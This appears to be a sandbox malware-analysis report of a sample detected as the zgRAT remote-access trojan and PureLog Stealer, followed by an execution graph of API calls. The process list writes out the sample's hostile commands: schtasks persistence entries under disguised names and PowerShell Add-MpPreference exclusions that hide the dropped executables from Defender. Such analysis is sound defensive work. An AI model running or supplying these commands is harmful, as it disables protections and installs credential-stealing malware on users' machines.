                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4FDD.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCAA8B5102F2134902BBA166DD4B5C8948.TMP"
                                                                Imagebase:0x7ff6f9d30000
                                                                File size:52'744 bytes
                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:13
                                                                Start time:10:25:38
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imeik232\imeik232.cmdline"
                                                                Imagebase:0x7ff6556f0000
                                                                File size:2'759'232 bytes
                                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:14
                                                                Start time:10:25:38
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:15
                                                                Start time:10:25:38
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES520F.tmp" "c:\Windows\System32\CSCBE040DD0C77A40C69F3560F59F6749C9.TMP"
                                                                Imagebase:0x7ff6f9d30000
                                                                File size:52'744 bytes
                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:16
                                                                Start time:10:25:39
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'" /f
                                                                Imagebase:0x7ff75f120000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:20
                                                                Start time:10:25:39
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "wnSgpBKJabSHvDawwFjyhiOtGEGVta" /sc ONLOGON /tr "'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'" /rl HIGHEST /f
                                                                Imagebase:0x7ff75f120000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:33
                                                                Start time:10:25:39
                                                                Start date:11/01/2025
                                                                Path:C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe
                                                                Imagebase:0x70000
                                                                File size:2'020'864 bytes
                                                                MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 63%, ReversingLabs
                                                                Has exited:true

                                                                General

                                                                Target ID:35
                                                                Start time:10:25:39
                                                                Start date:11/01/2025
                                                                Path:C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe
                                                                Imagebase:0x1e0000
                                                                File size:2'020'864 bytes
                                                                MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:38
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe'
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:39
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:40
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:41
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:42
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:43
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\SystemSettings.exe'
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:44
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:45
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'
                                                                Imagebase:0x7ff6068e0000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:46
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:47
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\msproviderBrokerMonitornet\WinPerfcommon.exe'
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:48
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:49
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:50
                                                                Start time:10:25:41
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\emoAWdy2Gj.bat"
                                                                Imagebase:0x7ff6c1f90000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:51
                                                                Start time:10:25:41
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:52
                                                                Start time:10:25:41
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\chcp.com
                                                                Wow64 process (32bit):false
                                                                Commandline:chcp 65001
                                                                Imagebase:0x7ff685350000
                                                                File size:14'848 bytes
                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:54
                                                                Start time:10:25:42
                                                                Start date:11/01/2025
                                                                Path:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                Imagebase:0x7a0000
                                                                File size:2'020'864 bytes
                                                                MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:55
                                                                Start time:10:25:42
                                                                Start date:11/01/2025
                                                                Path:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                Imagebase:0x820000
                                                                File size:2'020'864 bytes
                                                                MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:56
                                                                Start time:10:25:42
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\PING.EXE
                                                                Wow64 process (32bit):false
                                                                Commandline:ping -n 10 localhost
                                                                Imagebase:0x7ff75fa20000
                                                                File size:22'528 bytes
                                                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:69
                                                                Start time:10:26:19
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\Conhost.exe
                                                                Wow64 process (32bit):
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:
                                                                Has administrator privileges:
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:9.4%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:9.4%
                                                                  Total number of Nodes:1489
                                                                  Total number of Limit Nodes:40
                                                                  execution_graph 25385 46a440 GdipCloneImage GdipAlloc 25386 473a40 5 API calls CatchGuardHandler 25435 481f40 CloseHandle 23603 46e44b 23604 46e3f4 23603->23604 23604->23603 23606 46e85d 23604->23606 23632 46e5bb 23606->23632 23608 46e86d 23609 46e8ee 23608->23609 23610 46e8ca 23608->23610 23614 46e966 LoadLibraryExA 23609->23614 23615 46e9c7 23609->23615 23618 46e9d9 23609->23618 23627 46ea95 23609->23627 23611 46e7fb DloadReleaseSectionWriteAccess 6 API calls 23610->23611 23612 46e8d5 RaiseException 23611->23612 23613 46eac3 23612->23613 23613->23604 23614->23615 23616 46e979 GetLastError 23614->23616 23615->23618 23619 46e9d2 FreeLibrary 23615->23619 23620 46e9a2 23616->23620 23621 46e98c 23616->23621 23617 46ea37 GetProcAddress 23623 46ea47 GetLastError 23617->23623 23617->23627 23618->23617 23618->23627 23619->23618 23622 46e7fb DloadReleaseSectionWriteAccess 6 API calls 23620->23622 23621->23615 23621->23620 23624 46e9ad RaiseException 23622->23624 23625 46ea5a 23623->23625 23624->23613 23625->23627 23628 46e7fb DloadReleaseSectionWriteAccess 6 API calls 23625->23628 23641 46e7fb 23627->23641 23629 46ea7b RaiseException 23628->23629 23630 46e5bb ___delayLoadHelper2@8 6 API calls 23629->23630 23631 46ea92 23630->23631 23631->23627 23633 46e5c7 23632->23633 23634 46e5ed 23632->23634 23649 46e664 23633->23649 23634->23608 23636 46e5cc 23637 46e5e8 23636->23637 23652 46e78d 23636->23652 23657 46e5ee GetModuleHandleW GetProcAddress GetProcAddress 23637->23657 23640 46e836 23640->23608 23642 46e82f 23641->23642 23643 46e80d 23641->23643 23642->23613 23644 46e664 DloadReleaseSectionWriteAccess 3 API calls 23643->23644 23645 46e812 23644->23645 23646 46e82a 23645->23646 23647 46e78d DloadProtectSection 3 API calls 23645->23647 23660 46e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23646->23660 23647->23646 23658 46e5ee GetModuleHandleW GetProcAddress GetProcAddress 23649->23658 23651 46e669 23651->23636 23654 46e7a2 DloadProtectSection 23652->23654 23653 46e7a8 23653->23637 23654->23653 23655 46e7dd VirtualProtect 23654->23655 23659 46e6a3 VirtualQuery GetSystemInfo 23654->23659 23655->23653 23657->23640 23658->23651 23659->23655 23660->23642 25387 46e455 14 API calls ___delayLoadHelper2@8 23698 46cd58 23699 46ce22 23698->23699 23706 46cd7b _wcschr 23698->23706 23714 46c793 _wcslen _wcsrchr 23699->23714 23726 46d78f 23699->23726 23702 46d40a 23704 461fbb CompareStringW 23704->23706 23705 46ca67 SetWindowTextW 23705->23714 23706->23699 23706->23704 23711 46c855 SetFileAttributesW 23712 46c90f GetFileAttributesW 23711->23712 23724 46c86f __cftof _wcslen 23711->23724 23712->23714 23716 46c921 DeleteFileW 23712->23716 23714->23702 23714->23705 23714->23711 23717 46cc31 GetDlgItem SetWindowTextW SendMessageW 23714->23717 23720 46cc71 SendMessageW 23714->23720 23725 461fbb CompareStringW 23714->23725 23748 46b314 23714->23748 23752 46a64d GetCurrentDirectoryW 23714->23752 23754 45a5d1 6 API calls 23714->23754 23755 45a55a FindClose 23714->23755 23756 46b48e 76 API calls 2 library calls 23714->23756 23757 473e3e 23714->23757 23716->23714 23718 46c932 23716->23718 23717->23714 23719 454092 _swprintf 51 API calls 23718->23719 23721 46c952 GetFileAttributesW 23719->23721 23720->23714 23721->23718 23722 46c967 MoveFileW 23721->23722 23722->23714 23723 46c97f MoveFileExW 23722->23723 23723->23714 23724->23712 23724->23714 23753 45b991 51 API calls 3 library calls 23724->23753 23725->23714 23730 46d799 __cftof _wcslen 23726->23730 23727 46d9e7 23727->23714 23728 46d9c0 23728->23727 23734 46d9de ShowWindow 23728->23734 23729 46d8a5 23770 45a231 23729->23770 23730->23727 23730->23728 23730->23729 23773 461fbb CompareStringW 23730->23773 23734->23727 23736 46d8d1 23736->23727 23737 46d925 23736->23737 23738 46d97b CloseHandle 23736->23738 23742 46d91b ShowWindow 23736->23742 23775 46dc3b 6 API calls 23737->23775 23739 46d994 23738->23739 23740 46d989 23738->23740 23739->23728 23776 461fbb CompareStringW 23740->23776 23742->23737 23744 46d93d 23744->23738 23745 46d950 GetExitCodeProcess 23744->23745 23745->23738 23746 46d963 23745->23746 23746->23738 23749 46b31e 23748->23749 23750 46b40d 23749->23750 23751 46b3f0 ExpandEnvironmentStringsW 23749->23751 23750->23714 23751->23750 23752->23714 23753->23724 23754->23714 23755->23714 23756->23714 23758 478e54 23757->23758 23759 478e61 23758->23759 23760 478e6c 23758->23760 23791 478e06 23759->23791 23761 478e74 23760->23761 23768 478e7d _unexpected 23760->23768 23763 478dcc _free 20 API calls 23761->23763 23766 478e69 23763->23766 23764 478ea7 HeapReAlloc 23764->23766 23764->23768 23765 478e82 23798 4791a8 20 API calls _free 23765->23798 23766->23714 23768->23764 23768->23765 23799 477a5e 7 API calls 2 library calls 23768->23799 23777 45a243 23770->23777 23773->23729 23774 45b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23774->23736 23775->23744 23776->23739 23785 46ec50 23777->23785 23780 45a261 23787 45bb03 23780->23787 23781 45a23a 23781->23736 23781->23774 23783 45a275 23783->23781 23784 45a279 GetFileAttributesW 23783->23784 23784->23781 23786 45a250 GetFileAttributesW 23785->23786 23786->23780 23786->23781 23788 45bb10 _wcslen 23787->23788 23789 45bbb8 GetCurrentDirectoryW 23788->23789 23790 45bb39 _wcslen 23788->23790 23789->23790 23790->23783 23792 478e44 23791->23792 23796 478e14 _unexpected 23791->23796 23801 4791a8 20 API calls _free 23792->23801 23794 478e2f RtlAllocateHeap 23795 478e42 23794->23795 23794->23796 23795->23766 23796->23792 23796->23794 23800 477a5e 7 API calls 2 library calls 23796->23800 23798->23766 23799->23768 23800->23796 23801->23795 25437 477f6e 52 API calls 2 library calls 25389 46c793 107 API calls 5 library calls 25390 478268 55 API calls _free 25391 451075 84 API calls 24683 459a74 24686 459a7e 24683->24686 24684 459b9d SetFilePointer 24685 459bb6 GetLastError 24684->24685 24688 459ab1 24684->24688 24685->24688 24686->24684 24687 45981a 79 API calls 24686->24687 24686->24688 24689 459b79 24686->24689 24687->24689 24689->24684 25392 46a070 10 API calls 25394 46b270 99 API calls 25439 451f72 128 API calls __EH_prolog 24737 459f7a 24738 459f8f 24737->24738 24739 459f88 24737->24739 24740 459f9c GetStdHandle 24738->24740 24747 459fab 24738->24747 24740->24747 24741 45a003 WriteFile 24741->24747 24742 459fd4 WriteFile 24743 459fcf 24742->24743 24742->24747 24743->24742 24743->24747 24745 45a095 24749 456e98 77 API calls 24745->24749 24747->24739 24747->24741 24747->24742 24747->24743 24747->24745 24748 456baa 78 API calls 24747->24748 24748->24747 24749->24739 25396 46a400 GdipDisposeImage GdipFree 25397 46d600 70 API calls 25398 476000 QueryPerformanceFrequency QueryPerformanceCounter 25400 47f200 51 API calls 25442 472900 6 API calls 4 library calls 25444 47a700 21 API calls 25446 451710 86 API calls 25447 46ad10 73 API calls 25403 451025 29 API calls 25404 47f421 21 API calls __vsnwprintf_l 25405 46c220 93 API calls _swprintf 25450 46f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25451 46ff30 LocalFree 25257 47bb30 25258 47bb42 25257->25258 25259 47bb39 25257->25259 25261 47ba27 25259->25261 25262 4797e5 _unexpected 38 API calls 25261->25262 25263 47ba34 25262->25263 25281 47bb4e 25263->25281 25265 47ba3c 25290 47b7bb 25265->25290 25268 47ba53 25268->25258 25269 478e06 __vsnwprintf_l 21 API calls 25270 47ba64 25269->25270 25271 47ba96 25270->25271 25297 47bbf0 25270->25297 25273 478dcc _free 20 API calls 25271->25273 25273->25268 25275 47ba91 25307 4791a8 20 API calls _free 25275->25307 25277 47bada 25277->25271 25308 47b691 26 API calls 25277->25308 25278 47baae 25278->25277 25279 478dcc _free 20 API calls 25278->25279 25279->25277 25282 47bb5a ___scrt_is_nonwritable_in_current_image 25281->25282 25283 4797e5 _unexpected 38 API calls 25282->25283 25288 47bb64 25283->25288 25285 47bbe8 _abort 25285->25265 25288->25285 25289 478dcc _free 20 API calls 25288->25289 25309 478d24 38 API calls _abort 25288->25309 25310 47ac31 EnterCriticalSection 25288->25310 25311 47bbdf LeaveCriticalSection _abort 25288->25311 25289->25288 25291 474636 __cftof 38 API calls 25290->25291 25292 47b7cd 25291->25292 25293 47b7ee 25292->25293 25294 47b7dc GetOEMCP 25292->25294 25295 47b7f3 GetACP 25293->25295 25296 47b805 25293->25296 25294->25296 25295->25296 25296->25268 25296->25269 25298 47b7bb 40 API calls 25297->25298 25299 47bc0f 25298->25299 25302 47bc60 IsValidCodePage 25299->25302 25304 47bc16 25299->25304 25306 47bc85 __cftof 25299->25306 25300 46fbbc CatchGuardHandler 5 API calls 25301 47ba89 25300->25301 25301->25275 25301->25278 25303 47bc72 GetCPInfo 25302->25303 25302->25304 25303->25304 25303->25306 25304->25300 25312 47b893 GetCPInfo 25306->25312 25307->25271 25308->25271 25310->25288 25311->25288 25313 47b977 25312->25313 25317 47b8cd 25312->25317 25316 46fbbc CatchGuardHandler 5 API calls 25313->25316 25319 47ba23 25316->25319 25322 47c988 25317->25322 25319->25304 25321 47ab78 __vsnwprintf_l 43 API calls 25321->25313 25323 474636 __cftof 38 API calls 25322->25323 25324 47c9a8 MultiByteToWideChar 25323->25324 25326 47c9e6 25324->25326 25327 47ca7e 25324->25327 25330 478e06 __vsnwprintf_l 21 API calls 25326->25330 25333 47ca07 __cftof __vsnwprintf_l 25326->25333 25328 46fbbc CatchGuardHandler 5 API calls 25327->25328 25331 47b92e 25328->25331 25329 47ca78 25341 47abc3 20 API calls _free 25329->25341 25330->25333 25336 47ab78 25331->25336 25333->25329 25334 47ca4c MultiByteToWideChar 25333->25334 25334->25329 25335 47ca68 GetStringTypeW 25334->25335 25335->25329 25337 474636 __cftof 38 API calls 25336->25337 25338 47ab8b 25337->25338 25342 47a95b 25338->25342 25341->25327 25343 47a976 __vsnwprintf_l 25342->25343 25344 47a99c MultiByteToWideChar 25343->25344 25345 47a9c6 25344->25345 25346 47ab50 25344->25346 25351 478e06 __vsnwprintf_l 21 API calls 25345->25351 25353 47a9e7 __vsnwprintf_l 25345->25353 25347 46fbbc CatchGuardHandler 5 API calls 25346->25347 25348 47ab63 25347->25348 25348->25321 25349 47aa30 MultiByteToWideChar 25350 47aa9c 25349->25350 25352 47aa49 25349->25352 25378 47abc3 20 API calls _free 25350->25378 25351->25353 25369 47af6c 25352->25369 25353->25349 25353->25350 25357 47aa73 25357->25350 25360 47af6c __vsnwprintf_l 11 API calls 25357->25360 25358 47aaab 25359 478e06 __vsnwprintf_l 21 API calls 25358->25359 25363 47aacc __vsnwprintf_l 25358->25363 25359->25363 25360->25350 25361 47ab41 25377 47abc3 20 API calls _free 25361->25377 25363->25361 25364 47af6c __vsnwprintf_l 11 API calls 25363->25364 25365 47ab20 25364->25365 25365->25361 25366 47ab2f WideCharToMultiByte 25365->25366 25366->25361 25367 47ab6f 25366->25367 25379 47abc3 20 API calls _free 25367->25379 25370 47ac98 _unexpected 5 API calls 25369->25370 25371 47af93 25370->25371 25374 47af9c 25371->25374 25380 47aff4 10 API calls 3 library calls 25371->25380 25373 47afdc LCMapStringW 25373->25374 25375 46fbbc CatchGuardHandler 5 API calls 25374->25375 25376 47aa60 25375->25376 25376->25350 25376->25357 25376->25358 25377->25350 25378->25346 25379->25350 25380->25373 25408 47c030 GetProcessHeap 23470 46dec2 23471 46decf 23470->23471 23478 45e617 23471->23478 23479 45e627 23478->23479 23490 45e648 23479->23490 23482 454092 23513 454065 23482->23513 23485 46b568 PeekMessageW 23486 46b583 GetMessageW 23485->23486 23487 46b5bc 23485->23487 23488 46b5a8 TranslateMessage DispatchMessageW 23486->23488 23489 46b599 IsDialogMessageW 23486->23489 23488->23487 23489->23487 23489->23488 23496 45d9b0 23490->23496 23493 45e645 23493->23482 23494 45e66b LoadStringW 23494->23493 23495 45e682 LoadStringW 23494->23495 23495->23493 23501 45d8ec 23496->23501 23498 45d9cd 23499 45d9e2 23498->23499 23509 45d9f0 26 API calls 23498->23509 23499->23493 23499->23494 23502 45d904 23501->23502 23508 45d984 _strncpy 23501->23508 23504 45d928 23502->23504 23510 461da7 WideCharToMultiByte 23502->23510 23505 45d959 23504->23505 23511 45e5b1 50 API calls __vsnprintf 23504->23511 23512 476159 26 API calls 3 library calls 23505->23512 23508->23498 23509->23499 23510->23504 23511->23505 23512->23508 23514 45407c __vswprintf_c_l 23513->23514 23517 475fd4 23514->23517 23520 474097 23517->23520 23521 4740d7 23520->23521 23522 4740bf 23520->23522 23521->23522 23524 4740df 23521->23524 23544 4791a8 20 API calls _free 23522->23544 23546 474636 23524->23546 23526 4740c4 23545 479087 26 API calls __cftof 23526->23545 23529 4740cf 23537 46fbbc 23529->23537 23532 474167 23555 4749e6 51 API calls 4 library calls 23532->23555 23533 454086 SetDlgItemTextW 23533->23485 23536 474172 23556 4746b9 20 API calls _free 23536->23556 23538 46fbc4 23537->23538 23539 46fbc5 IsProcessorFeaturePresent 23537->23539 23538->23533 23541 46fc07 23539->23541 23557 46fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23541->23557 23543 46fcea 23543->23533 23544->23526 23545->23529 23547 474653 23546->23547 23549 4740ef 23546->23549 23547->23549 23558 4797e5 GetLastError 23547->23558 23554 474601 20 API calls 2 library calls 23549->23554 23550 474674 23578 47993a 38 API calls __cftof 23550->23578 23552 47468d 23579 479967 38 API calls __cftof 23552->23579 23554->23532 23555->23536 23556->23529 23557->23543 23559 4797fb 23558->23559 23562 479801 23558->23562 23580 47ae5b 11 API calls 2 library calls 23559->23580 23564 479850 SetLastError 